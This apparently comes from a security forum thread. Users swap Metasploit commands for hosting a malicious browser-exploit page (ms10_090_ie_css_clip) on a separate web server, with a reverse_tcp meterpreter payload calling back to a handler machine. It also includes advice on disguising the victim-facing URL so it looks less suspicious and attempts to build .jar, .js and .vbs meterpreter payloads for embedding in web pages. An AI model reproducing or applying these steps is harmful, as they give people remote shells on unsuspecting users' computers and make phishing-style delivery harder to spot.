Metasploit server

[comaX]

Hi everyone !
In browser attacks, a server is launched on BT but i would like to "move the server" ; let me explain : instead of going to http://192.168.1.2:8080/test for example (which is my bt machine adress with malicious webpage), I would like to export the malicious webpage to another server. Then i would just have to launch the handler on the bt machine.

Is that possible, if yes, how to ?

Ps: for those wondering what's the use, well not so much... I would just like to know, the same way I wanted to know metasploit, with no goal.
Ps2 : Sorry for grammar errors and Co, english is not my native langage.

[purehate]

Well there are two different variables to set. Lhost is the attacking box and srvhost is the server host. Explore changing the server host.

[comaX]

Thanks for the fast answer. I tried modifying SRVHOST, server was not started (as expected). But I couldn't get to do what I wanted...

the parameters are :
SRVHOST = Com.org - Only the best links ... (the server I would like the webpage to be to... Of course i didn't expect a page to show up on the server out of nowhere)
SRVHOST = 80
URIPATH = test

Handler caught signal when i entered the http://LHOST:SRVPORT/test but I don't comprehend what SRVHOST has to do with anything...

I'll dig some more but I really have no idea how to move the webpage... Isn't there a way to "export" the malicious webpage as *.html and then host it elsewhere ?

[iproute]

What is this second machine you are wanting to run the server on, windows or linux? I would run the metasploit framework(exploit)on your 'webserver' machine, point the reverse payload to you 'handler' machine IP, and set the option

Code:

msf exploit(ms10_090_ie_css_clip) > set DisablePayloadHandler=true

Then start the metasploit framework(handler) on your 'handler' machine.

With my exploit example, I usually set
srvhost=0.0.0.0 <--- tells the framework what IP address for the http server to listen on
srvport=80 <--- what port the http server will listen on.
uripath=/ <--- the webserver directory structure. Keeping it at / helps things stay simple.



So in other words, on your webserver machine you might start the framework and do this

Code:

 
use windows/browser/ms10_090_ie_css_clip
set srvhost 192.168.0.50 (this is your webserver machine IP)
set srvport 80
set uripath /
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.75 (this is your handler machine IP)
set lport 9999
set DisablePayloadHandler=true
exploit

and on your handler machine you would start the framework and do this

Code:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 9999
exploit

[comaX]

First of all, thank you !

I think that would be a good way to do that, but it requires two machines equipped with msf. And what I had in mind was creating the webpage on BT along with the payload. Then hosting the webpage on a server, so that when the page is visited, it connects back to the handler on the bt machine.

The server I use is wampserver on windows. I started the server to discover html, php and mysql few days ago and as I used an exploit that required a webpage, I thought of hosting the page on the wampserver, so that the page looks "normal", and not

Code:

http://adress:port/

which is suspicious. but for stealth purpose, I guess linking from a website to the malicious webpage would do the trick as people tend not to verify the URLs.

Can you think of any way to do that ?

From what you said and research I've done I'd say it can't be done, but it would be interesting to do.

About the srvhost : if I understand correctly, it is used to define the interface to use for listening ? So it generally is the local host IP adress, or 0.0.0.0 for all interfaces. Is there other ways to use this ?

[iproute]

If you set srvport to 80 then the URL you 'give' to victims is just h t t p://malicous.webserver.com/
and no port like :8080 needs to be at the end of the URL.
Again uripath is also useful as sometimes if you don't specify / as the path then the link ends up looking like
h t t p://malicious.webserver.com/ad45trfHY3
which is also somewhat suspicious

And yes you are correct, setting 0.0.0.0 for srvhost listens on all IP interfaces, and is generally easiest.


Also, metasploit is available on windows as well, so maybe just install MSF using the windows installer. Equipping two machines with MSF should be no problem, even if one is a windows host.
MSF for windows

Regarding creating the webpage on BT msf and exporting to windows webserver, maybe try viewing the source of the page created on the BT machine perhaps. You may actually need to dig into some of the framework's ruby to see how exactly it is configuring the webserver/exploit combo. When it comes to digging into the code, you may want to consider visiting the #metasploit channel on freenode's IRC and asking the developers some questions. They can often point you in the right direction.



EDIT: It sort of sounds like you're just having difficulty with how the link ends up looking? the default settings for the exploit I mentioned above for instance might look like http;//malicious.webserver.com:8080/df45DfrT67Yt
Just try the settings I suggested of

Code:

set srvport 80
set uripath /

which should clean up the link as I mentioned above, and let us know if that is what you were really looking for. The second server should not be needed with these settings

[comaX]

I think this answers part of the question : I read quickly through it because I don't really have the time right now, but it seems that if you create a malicious java applet and host it on your server, this will do just as designed.

I'll dig some more when I have time and keep you posted in case of success.

I stumbled upon this while trying to generate .jar payload, which was an epic failure. So, if you know how to do that, please tell !
(I used /java/meterpreter/reverse_tcp and tried generating with following commands :

Code:

generate -f java_evil.jar -t java
generate -f java_evil.jar -t java -x workingjar.jar -k

and both produced mamfunctionning jars...)

What I basically want to do is done by SET, but then again, it will be hosted on the BT machine. Maybe is there a way to output the java applet so that it can be hosted elsewhere ? Or if there is no proper output, maybe it could be harvested is some way ? Then again, if you have any idea... Please tell ! I'll of course keep searching.


As for :80 and URIPATH / i didn't think of it, and it sure works But I can't use the port 80 for it is already in use by the server I intend to host a malicious page on... I also tried msf on windows but even with exceptions set, my AV was going all crazy, and still is, long after (not so proper) uninstallation, so I decided just to not use msf on windows.

Also, maybe I should post in other threads, but since it may be relevant to this topic : i generated .js and .vbs payloads, thinking I could use them in

Code:

<script language="blabla" src="blabla.extension"> </script>

but it didn't work, at all.
Since the .js didn't work in windows, it's not so surprising, but the .vbs did launch a meterpreter session when executed in explorer, but failed from browser. Maybe my tags are wrong... I also tried with

Code:

<script language="blabla" > actual_vbs_or_js_script </script>

but it didn't work either.

Any idea about how to do that ?